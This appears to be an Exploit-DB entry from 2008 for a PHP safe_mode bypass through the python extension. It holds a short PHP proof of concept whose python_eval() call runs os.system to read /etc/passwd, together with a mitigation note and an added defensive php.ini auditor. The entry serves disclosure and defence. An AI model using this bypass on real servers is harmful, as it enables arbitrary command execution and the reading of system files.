PHP Python Extension Safe_Mode Bypass

Vendor: N/A
By: Amir Salmani
CVSS: 7.5 (HIGH)
CWE: 94
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

php_python_bypass.php

This exploit bypasses PHP's safe_mode restriction by way of the python extension. It calls the python_eval() function to execute arbitrary Python code, which in turn can run system commands.

Mitigation:

Disable the python extension in php.ini or restrict access to the python_eval() function.
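
An added example (not part of the original entry or the exploit author's code): a small Python auditor that checks php.ini text for the two mitigations named above. The sample php.ini is constructed for the demo, and the extension file names it matches (python.so, php_python.dll) are assumptions.

```python
import re

# Constructed php.ini fragment for the demo (not taken from any real host).
SAMPLE_INI = """\
[PHP]
safe_mode = On
;extension=python.so
extension = "python.so"
disable_functions = exec, system
disable_functions = exec, system, passthru   ; later line wins
"""

def audit_php_ini(text):
    """Return (python_ext_enabled, python_eval_disabled, findings) for php.ini text."""
    ext_enabled = False
    disabled = set()
    for raw in text.splitlines():
        # ';' starts a comment in php.ini (simplification: ';' inside quotes is not handled).
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        value = value.strip("\"'")
        key = key.lower()
        if key == "extension":
            # Assumed file names: python, python.so, php_python.dll, or a full path to one.
            name = re.split(r"[\\/]", value)[-1].lower()
            if re.fullmatch(r"(php_)?python(\.so|\.dll)?", name):
                ext_enabled = True
        elif key == "disable_functions":
            # Scalar directive: the last assignment replaces earlier ones.
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    eval_disabled = "python_eval" in disabled
    findings = []
    if ext_enabled and not eval_disabled:
        findings.append("python extension loaded and python_eval() callable")
    elif ext_enabled:
        findings.append("python extension loaded; python_eval() disabled")
    return ext_enabled, eval_disabled, findings

if __name__ == "__main__":
    for finding in audit_php_ini(SAMPLE_INI)[2]:
        print("FINDING:", finding)
```
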
Source

Exploit-DB raw data:

<?php
/*
  php_python_bypass.php
  php python extension safe_mode bypass
  Amir Salmani - amir[at]salmani[dot]ir
*/

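// Abort unless the python extension is loaded
if (!extension_loaded('python')) die("python extension is not installed\n");

// Evaluate Python source through the extension; this code runs outside PHP's safe_mode checks.
// The inner string uses double quotes so it does not terminate the single-quoted PHP string.
$res = python_eval('
import os
pwd = os.getcwd()
print pwd
os.system("cat /etc/passwd")
');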

//show result
echo $res;
?>

# milw0rm.com [2008-12-17]